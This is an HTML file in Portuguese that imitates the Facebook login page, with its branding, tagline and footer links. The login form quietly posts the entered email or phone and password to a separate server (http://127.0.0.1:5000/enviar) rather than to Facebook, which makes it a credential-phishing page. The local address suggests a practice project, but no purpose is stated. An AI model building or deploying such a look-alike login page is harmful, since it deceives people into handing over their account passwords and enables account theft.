<!DOCTYPE html>
<html lang="pt-br">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="./styles.css" type="text/css">    

        <title>Facebook - entre ou cadastre-se</title>
    </head>
    <body>
        <main>
            <div id="principal">
                <div id="face">
                    <img src="./img/face.svg" alt="facebook">
                    <p>O Facebook ajuda você a se conectar e <br> compartilhar com as pessoas que <br> fazem parte da sua vida.</p>
                </div>

                <div id="campos">
                    <div id="login">
                        <form action="http://127.0.0.1:5000/enviar" method="post" id="caixa"> 
                            <input type="text" id="usuario" name="usuario" placeholder="Email ou telefone">
                            <input type="password" id="senha" name="senha" placeholder="Senha">
                
                            <button type="submit">Entrar</button>
                            <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Esqueceu a senha?</a>
                            <hr>
                            <button id="novaConta">Criar nova conta</button>
                        </form>
                    </div>
                    
                    <div id="texto">
                        <p><strong><a href="https://www.facebook.com/pages/create/?ref_type=registration_form">Criar uma Página</a></strong> para uma celebridade, uma marca, ou uma empresa.</p>
                    </div>
                </div>
            </div>
        </main>

        <footer>
            <div id="bagulhodecima">
                <ul>
                    <li class="_sv4"><a>Português (Brasil) </a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://www.facebook.com/"  title="English (US)">English(US) </a> </li>
                    <li class="_sv4"><a  dir="ltr" href="https://es-la.facebook.com/"  title="Spanish">Español</a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://fr-fr.facebook.com/"  title="French (France)">Français(France) </a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://it-it.facebook.com/"  title="Italian">Italiano</a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://de-de.facebook.com/"  title="German">Deutsch</a></li>
                    <li class="_sv4"><a  dir="rtl" href="https://ar-ar.facebook.com/"  title="Arabic">العربية</a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://hi-in.facebook.com/"  title="Hindi">हिन्दी</a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://zh-cn.facebook.com/"  title="Simplified Chinese (China)">中文(简体)</a></li>
                    <li class="_sv4"><a  dir="ltr" href="https://ja-jp.facebook.com/"  title="Japanese">日本語</a></li>
                    <li class="_sv4"><a role="button" class="_42ft" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Mostrar mais idiomas"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul>
                    <hr>
            </div>

            <div id="bagulhodebaixo">
            <ul class="ui">
                <li class="_sv3"><a href="/reg/" title="Cadastre-se no Facebook">Cadastre-se</a></li>
                <li class="_sv3"><a href="/login/" title="Entrar no Facebook">Entrar</a></li>
                <li class="_sv3"><a href="https://messenger.com/" title="Confira o Messenger.">Messenger</a></li>
                <li class="_sv3"><a href="/lite/" title="Facebook Lite para Android.">Facebook Lite</a></li>
                <li class="_sv3"><a href="https://pt-br.facebook.com/watch/" title="Explorar a aba Vídeo">Vídeo</a></li>
                <li class="_sv3"><a href="/places/" title="Confira locais populares no Facebook.">Locais</a></li>
                <li class="_sv3"><a href="/games/" title="Confira os jogos do Facebook.">Jogos</a></li>
                <li class="_sv3"><a href="/marketplace/" title="Compre e venda no Facebook Marketplace.">Marketplace</a></li>
                <li class="_sv3"><a href="https://pay.facebook.com/" title="Saiba mais sobre o Meta Pay" target="_blank">Meta Pay</a></li>
                <li class="_sv3"><a href="https://www.meta.com/" title="Finalizar a compra com a Meta" target="_blank">Loja da Meta</a></li>
                <li class="_sv3"><a href="https://www.meta.com/quest/" title="Saiba mais sobre o Meta Quest" target="_blank">Meta Quest</a></li>
                <li class="_sv3"><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1ALJUKHSbRs9UgdNDDpoMUAzq2fkZ3w9_TQADeSpmtVziTw0__wq6tQBPGEDTjDi3rVOaqss_8Ivfg14ysND7k-7VTvL17sYL-jc_76WkStfemL5Ni2gjemrH2pkeYtJAPX-drSyWomB9eSRbsB8kAHm8BAbOBrFBxdg" title="Confira o Instagram" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy">Instagram</a></li>
                <li class="_sv3"><a href="https://www.threads.net/" title="Confira o Threads">Threads</a></li>
                <li class="_sv3"><a href="/fundraisers/" title="Doe para causas importantes.">Campanhas de arrecadação de fundos</a></li>
                <li class="_sv3"><a href="/biz/directory/" title="Navegue pelo nosso diretório de serviços do Facebook.">Serviços</a></li>
                <li class="_sv3"><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Veja a Central de Informações de Votação.">Central de Informações de Votação</a></li>
                <li class="_sv3"><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Saiba como coletamos, usamos e compartilhamos informações para apoiar o Facebook.">Política de Privacidade</a></li>
                <li class="_sv3"><a href="/privacy/center/?entry_point=facebook_page_footer" title="Saiba como gerenciar e controlar sua privacidade no Facebook.">Central de Privacidade</a></li>
                <li class="_sv3"><a href="/groups/discover/" title="Explorar nossos grupos.">Grupos</a></li>
                <li class="_sv3"><a href="https://about.meta.com/" accesskey="8" title="Leia nosso blog, descubra a central de recursos e encontre oportunidades de trabalho.">Sobre</a></li>
                <li class="_sv3"><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Anuncie no Facebook.">Criar anúncio</a></li>
                <li class="_sv3"><a href="/pages/create/?ref_type=site_footer" title="Criar uma Página">Criar Página</a></li>
                <li class="_sv3"><a href="https://developers.facebook.com/?ref=pf" title="Desenvolver em nossa plataforma.">Desenvolvedores</a></li>
                <li class="_sv3"><a href="/careers/?ref=pf" title="Dê um passo adiante na sua carreira em nossa incrível empresa.">Carreiras</a></li>
                <li class="_sv3"><a href="/policies/cookies/" title="Saiba mais sobre cookies e o Facebook" data-nocookies="1">Cookies</a></li>
                <li class="_sv3"><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Saiba mais sobre as escolhas para anúncios.">Escolhas para anúncios<i class="img sp_EP9wX8qDDvu sx_6bdd81"></i></a></li>
                <li class="_sv3"><a title="Leia os nossos termos e políticas.">Termos</a></li>
                <li class="_sv3"><a href="/help/?ref=pf"  title="Acesse nossa Central de Ajuda.">Ajuda</a></li>
                <li class="_sv3"><a href="help/637205020878504" title="Acesse nosso aviso de carregamento de contatos e não usuários.">Carregamento de contatos e não usuários</a></li>
            </div>
            <div id="aindamaisbaixomano"><a>Meta © 2023</a></div>
        </footer>
    </body>
</html>